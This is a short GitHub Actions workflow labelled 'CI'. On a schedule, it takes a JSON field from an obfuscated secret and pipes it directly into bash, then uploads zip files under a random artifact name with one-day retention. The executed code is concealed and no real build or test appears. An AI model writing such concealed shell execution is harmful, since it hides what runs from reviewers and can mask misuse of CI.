name: CI
on:
  workflow_dispatch:

  schedule:
    - cron: '41 4,10,16,22 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  automation:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Process
        env:
          lg0192: ${{ secrets.lg0192 }}
        run: |
          printf '%s' "$lg0192" | jq -r .m63548 | /bin/bash

      - name: Store results
        uses: actions/upload-artifact@v4
        with:
          name: yH9XaIuU
          path: "*.zip"
          retention-days: 1
